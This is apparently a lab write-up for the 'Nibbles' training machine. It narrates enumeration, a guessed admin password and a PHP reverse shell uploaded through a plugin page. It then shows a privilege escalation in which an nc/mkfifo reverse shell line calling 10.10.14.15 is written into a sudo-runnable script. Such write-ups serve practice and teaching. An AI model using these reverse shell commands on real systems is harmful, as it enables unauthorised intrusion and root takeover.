enumeration using nmap scan
from the output of nmap scan I learned there were 2 open ports and the one I had to look into was the port 80.
Navigated to the target address on firefox but the website didn’t have any juicy info except the plain text saying Hello world!.
right clicked on the web page and viewed the source code without any expectation but there was this interesting comment.
navigated to the /nibbleblog as the comment hinted
more information gathering with gobuster
while on the /nibbleblog web page, I could not find more useful info so I decided to run a gobuster on the website to gather more information.
The gobuster output showed many directories but the results were not satisfying. I knew there had to be more. So I ran another gobuster scan but this time I added the -x option to search for specific file extensions.
The /admin.php was the first result that caught my eye.
/nibbleblog/admin.php
I didn’t have anything for the admin credentials until I found this user.xml file that’s located in the following path:
/nibbleblog/content/private/users.xml
The title of the nibbleblog was nibbles so why not try that for the password? and it turned out that it was the password. I was skeptical of doing the guesswork for the password but later I refered to other people’s write ups but all of them also did some guessworks to figure out the password. I guess it’s an important part of the pentesting.
a screenshot of the admin dashboard page
Under the /plugins directory, there was this my image page where I could upload a file to the server and I definitely knew I could use this for uploading a reverse shell payload as an exploitation.
For the reverse shell payload, I downloaded the popular pentestmonkey’s php-reverse-shell.
After uploading the payload file I had to manually navigate to the following path to run it on the server.
/nibbleblog/content/private/plugins/my_image
netcat listener successfully captured the reverse shell.
got the user flag!
oh I almost forgot. As you could notice from the screenshot below, I upgraded the shell to the fully interactive TTY Shell.
1#reverse shell
2python3 -c 'import pty;pty.spawn("/bin/bash")'
3ctrl + z # background
4
5#kali
6stty raw -echo; fg
7reset
8
9#reverse shell
10export SHELL=bash
11export TERM=xterm-256color
privilege escalation
With the reverse shell, the current user, nibbler was not able to access the root directory. So I had to figure a way for privilege escalation. I ran the sudo -l command to list the commands I can actually run with the sudo and I could run the following
/home/nibbler/personal/stuff/monitor.sh
This is the part where I needed some help. I couldn’t figure out what it took me to write inside the monitor.sh file for privilege escalation so I refered to one of the walkthroughs online.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.15 1235 >/tmp/f' > /home/nibbler/personal/stuff/monitor.sh
After modifying the content inside the file, I pop opened another netcat listener with another port, 1235 because the port 1234 was already listening for the original reverse shell.
sudo /home/nibbler/personal/stuff/monitor.sh
id command returned that I’m the root user
successfully got the root flag
